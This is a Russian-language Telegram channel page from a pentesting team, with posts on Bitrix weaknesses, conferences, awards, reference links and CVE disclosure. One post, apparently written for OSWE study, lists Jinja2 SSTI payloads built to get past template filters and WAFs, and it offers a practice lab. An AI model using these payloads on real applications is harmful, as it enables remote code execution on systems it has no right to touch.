GigaHackers – Telegram
GigaHackers
2.59K subscribers
97 photos
3 videos
10 files
80 links
Информация предоставлена исключительно в образовательных или исследовательских целях. Противоправные деяния преследуются по закону.
Авторы: @WILD_41, @Oki4_Doki и @VlaDriev
Download Telegram
[ Bitrix — поговорим о наболевшем ]

Всем привет!👋

Многие неоднократно слышали о CMS Bitrix — весьма удобная система для управления сайтом. Однако сильно уязвимая из "коробки". Об эксплуатации многих нюансов и уязвимостей было не раз сказано в комьюнити этичных хакеров.

Сейчас я хочу внести свой скромный вклад и рассказать о замеченных мною недостатках и особенностях этой CMS.

Данные мелочи не раз помогали мне как на Bug Bounty, так и на проектах по внешнему пентесту.

Надеюсь, что эти маленькие нюансы в сумме смогут помочь вам и вашей команде на проектах.

Приятного чтения:)

#bitrix24 #web #bug_bounty
🔥16👍113🦄1
[Abuse ACL AD]

Всем привет! 👋

Большое спасибо нашему другу @Michaelzhm за крутой 🔥🔥🔥 доклад в рамках нашей летней практики

➡️ Доклад можно найти на его канале здесь

➡️ Также залили видос на YouTube

Приятного просмотра! 🖥

#AD #start #learn #ACL
Please open Telegram to view this post
VIEW IN TELEGRAM
👍13🔥83🦄1
Media is too big
VIEW IN TELEGRAM
[ Если делаешь — делай с душой ]

С коллегами запустили мини-стенд в рамках летней практики для наших практикантов

Немного вдохновились и решили сделать видео 😎
Нашим практикантам удачи, а остальным рекомендуем залетать к нам на летнюю практику на будущий год 🤙🏼

#learn #start #brickoff
🔥18👍74🦄1
[Пентесты ОКИИ]

Всем привет!👋

В работе пентестера встречаются не только ламповые проекты, которые делаются удаленно из офиса, но и хардовые проекты с выездом на объекты к заказчику. Площадка может быть абсолютно любая, в частности относиться к ОКИИ 🏭🏦🏥

Коллеги из нашей команды подготовили крутой и полезный материал для всех, кто интересуется пентестами 🔥

📣 Для посещения регистрируйтесь заранее!
01.08.24 в 12:00 по Мск
Please open Telegram to view this post
VIEW IN TELEGRAM
👍9🔥61💩1👌1
[Полезные ссылки]

Всем привет! 👋

Сегодня у нас полезная информация для начинающих!

Невозможно запомнить каждую команду в голове, для этого существуют заметки.📝 Хочу поделиться ссылками на различные агрегаторы информации, которыми мы частенько пользуемся в работе.

📌 HackTricks - заметки на каждый день обо всем про пентест (про конкретные порты, службы, сервисы)

📌 The Hacker Recipes - годнота в основном про AD (готовые команды и рецепты на все случаи жизни)

📌 PayloadAllTheThings - репозиторий, содержащий различные словари для самых разных проверок, а также наборы техник и чеклистов под конкретные продукты, например AD

📌 Pentester's Promiscuous Notebook - крутые и очень полезные заметки пентестера

📌 Red Team Notes - заметочки с уклоном в red team

Пишите в комментария, чем пользуетесь лично вы? ✏️

#learn #start
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥15👍62🦄1
[Pentest award]

Всем привет! 👋

Хочу поделиться с вами радостным событием. В пятницу 2 августа прошла церемония награждения пентестеров, известная как Pentest award 2024 👑

В этом году участников стало больше, кейсы интереснее, и масштаб самой церемонии конечно увеличился!

В этом году мы с @WILD_41 попали в шорт-лист в нескольких номинациях.
Мой кейс в итоге удостоился 2 места в номинации "девайс", чему я безгранично рад! 🥈

Также хочется сказать огромное спасибо организаторам за шикарную подготовку мероприятия, жюри за проделанную работу по отбору кейсов. А победители в своих номинациях поистине крутые!

Всем, кто с мог прийти лично - отдельный респект, круто пообщались 💬

#pentestaward
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍20🔥116🦄1
Всем привет👋

Пока @WILD_41 и @VlaDriev ожидали результатов премии pentest award, я успел получить презенты за акцию от TimeWeb в рамках их BB программы.

Спасибо большое @bizone_bb и @timewebru за подарки. Вы делаете крутые вещи в сфере bug bounty!💪

А я снова скажу: не бойтесь пробовать и продолжайте развиваться, всё возможно👍

#bug_bounty
🔥20👍94😍1🦄1
[PoC Windows Downdate]

Всем привет!👋

Не так давно отгремели конференции Black Hat 2024 и DEF CON 32. Лучшие исследователи со всего мира поделились своими наработками. Хочу отметить несколько из них, которые меня заинтересовали. Публиковать буду постепенно, так как контента достаточно много.

Первый доклад, который меня зацепил - Windows Downdate: Downgrade Attacks Using Windows Updates

Автор рассказал как можно понизить версии отдельных файлов через центр обновления Windows и тем самым сделать ОС уязвимой к старым проблемам! 👍
Для понимания рекомендую к прочтению публикацию 📝

💻 И уже даже есть PoC с примерами от автора!

🐤 Ну и конечно ссылка на автора.


#Windows #PoC #AD #DC32 #BH2024 #CVE
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥12👍52👌2🦄1
Работаешь в IT или с IT? Тогда тебе точно понравится на UIC DEV 2024! 💥

🖥 UIC Dev - ежегодная Технологическая конференция для специалистов из интернет-сферы: от HR-ов до IT-директоров. Да, мы не только для разработчиков, но и для аналитиков, тестировщиков, дизайнеров, маркетологов, SEO-шников, копирайтеров и т.д.

В этом году на нашей 7-ой вечеринке тебя ждут:

🎯 6 больших направлений по несколько секций: разработка, управление и анализ, бизнес+IT, дизайн и контент, маркетинг и digital, UIC Talks.
🎯 80+ докладов про инструменты, кейсы, "боли" IT-сообщества, AI и будущее.
🎯 Обсуждение актуальных событий, разбор трендов из области IT и не только.
🎯 Общение с единомышленниками, дискуссии, обмен опытом, новые идеи.
🎯 Интерактивы и розыгрыши призов на стендах партнеров.

Вечером первого дня пройдет 🔥 афтепати с выступлением группы “Стихи на окнах подъезда №8”, дискотекой, лайтовым общением и развлечениями. 🚀

📅 7-8 октября 2024 г.
📍 ТРЦ “Сигма”, г. Ижевск, пер. Широкий, 53, 3-4 эт.
❗️ Подробности: uic.dev и vk.com/uicdev
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9👍32🥰1🦄1
[Обход фильтров в SSTI в Jinja2]

Не так давно в рамках подготовки к OSWE столкнулся с необходимостью обходить фильтры SSTI, проверяющие непосредственный темплейт.
Уязвимое приложение проверяло наличие .__ в строке передаваемого темплейта, что не давало просто использовать пейлоад из HackTricks и наслаждаться RCE на уязвимой машине.
Поэтому ловите несколько способов модификации пейлоада, чтобы обойти подобные фильтры или даже WAF целиком:

🔸 Для обхода фильтра по .__ можно использовать |attr()
{{ ''|attr('__class__’)}}

🔸 Можно использовать сложение строк или закодировать
{{request|attr("__"+"class"+"__")}}
{{''['\x5f\x5fclass\x5f\x5f']}}

🔸 Также можно обратиться к атрибутам по индексу
request["__class__"]

🔸 Кроме того, можно использовать Statements для определения переменных в темплейте
{% set string = "ssti" %}

{% set class = "__class__" %}

{{ string|attr(class)}}

{% with a = config.__class__.mro()[-1].__subclasses__() %} {{ a }} {% endwith %}

🔸 Для обхода фильтра по __ можно использовать requests.args для передачи частей полезной нагрузки в параметрах запроса и |join для соединения элементов в одну строку
{{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}}&class=class&usc=_

🔸 Для обхода фильтра по [] можно использовать |getlist(). Данный метод возвращает всех значения, связанные с определенным ключом в запросе
{{request|attr(request.args.getlist(request.args.l)|join)}}&l=a&a=_&a=_&a=class&a=_&a=_


🔸 В случае, если встретился фильтр по |join, можно использовать |format для форматирования строк по переданным значениями
{{request|attr(request.args.f|format(request.args.a,request.args.a,request.args.a,request.args.a))}}&f=%s%sclass%s%s&a=_


Конечно количество фильтров может быть разнообразным, но тут уже скорее встает вопрос комбинации предложенных выше методов. 👆


Для закрепления я разработал небольшой стенд 🔥. Кому будет интересно, то можете проверить знания и навыки в деле!

@GigaHack

#web #stand #SSTI #learn #OSWE
👍19🔥61👌1🦄1
ssti.py
3.8 KB
🙏4
[Полезный читшит для SSRF, CORS и open-redirect]

В последнее время у portswigger-а активно пополняются заметки по различным темам. Эта шпаргалка содержит полезные нагрузки для обхода проверки URL. Приведенные списки слов полезны для реализации следующих типов атак: SSRF, неправильные конфигурации CORS и open-redirect. Очень полезно, если кончились идеи, а ошибку с кодом 403 обходить надо. Также будет полезно и тем, кто только погружается историю с данными веб-уязвимостями.

https://portswigger.net/web-security/ssrf/url-validation-bypass-cheat-sheet


#web #bypass #cheet_sheet
🔥14👍3👌3🦄1
Forwarded from Just Security
This media is not supported in your browser
VIEW IN TELEGRAM
Опубликовали видеоролик о том, как прошла ежегодная независимая премия Pentest award 2024!

Радостные лица, толпа заряженных специалистов, и, конечно, счастливые победители с наградами в руках — настоящий праздник этичного хакинга.

Здорово было встретится в офлайне со старыми друзьями и коллегами, познакомиться с новыми людьми, обменяться знаниями и идеями, поговорить о важном, профессиональном, наболевшем.

До встречи в 2025 году 👋

Отдельная благодарность партнерам проекта: BI.ZONE Bug Bounty, VK Bug Bounty, OFFZONE и CyberED.

📺 Полное видео
🔗 Pentest award (архив)
@justsecurity
Please open Telegram to view this post
VIEW IN TELEGRAM
👍13🔥64🦄1
Всем привет! Сегодня выступаю на вебинаре у УЦ Маском (@mascom_uc). Расскажу о том как проводить разведку при пентесте внешнего периметра и веб-приложения и какие инструменты можно для этого использовать.

Ждём всех сегодня в 19.00 по МСК 😎
Кто ещё не записался, сделать это можно по 👉 ссылке

👉Презентация

#web #conference
🔥21👍54🦄1
[Регистрация уязвимостей]

Всем привет! 👋

Сегодня хочу поднять важную тему для каждого ИБ-специалиста, особенно пентестера. Однажды вы можете обнаружить уязвимость, которую никто нигде не публиковал, и не важно, специально вы ее искали или нашли мимоходом. 👀 Будучи настоящими этичными хакерами у вас может возникнуть желание сообщить об уязвимости вендору/производителю софта или оборудования, но как это это сделать?

Чутка теории: зарегистрировать уязвимость можно в БДУ ФСТЭК (но только в ПО, которое "используется на объектах ГИС и КИИ"), со всеми остальными уязвимостями нужно идти в MITRE и регистрировать CVE. 🐈

Весь процесс очень зависит от вендора, с которым вы взаимодействуете, но если вам повезло, то в идеале это будет строиться примерно по схеме, которую я разместил в своих заметках. 📝

Иногда бывают различные выдающиеся случаи 💻, о которых лучше говорить отдельно и в формате подкаста или посиделок (кстати, если у вас есть такие истории и желание поделиться ими - дайте знать в комментах или в ЛС) ✏️

В заключении хочется сказать, что безумно приятно взаимодействовать с адекватными вендорами, которые ради тебя готовы даже открыть зал славы. 🔥

#cve #learn #notes
Please open Telegram to view this post
VIEW IN TELEGRAM
👍17🔥94🥰1🌭1
[Кибербез комьюнити]

Всем привет! 👋

Коллеги из «ГОС ИТ Богатырева» включили наш канал в папку по кибербезопасности. 🗂

В папке собраны каналы с полезной информацией в мире ИБ на самый разный вкус! Думаю, что подборка будет расширяться и обновляться, поэтому следите за новостями!

Добавляйте к себе папку и делить с друзьями и коллегами 🏆

#learn #start
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥15👍65🦄1
This media is not supported in your browser
VIEW IN TELEGRAM
🔥9🫡63👍2😁1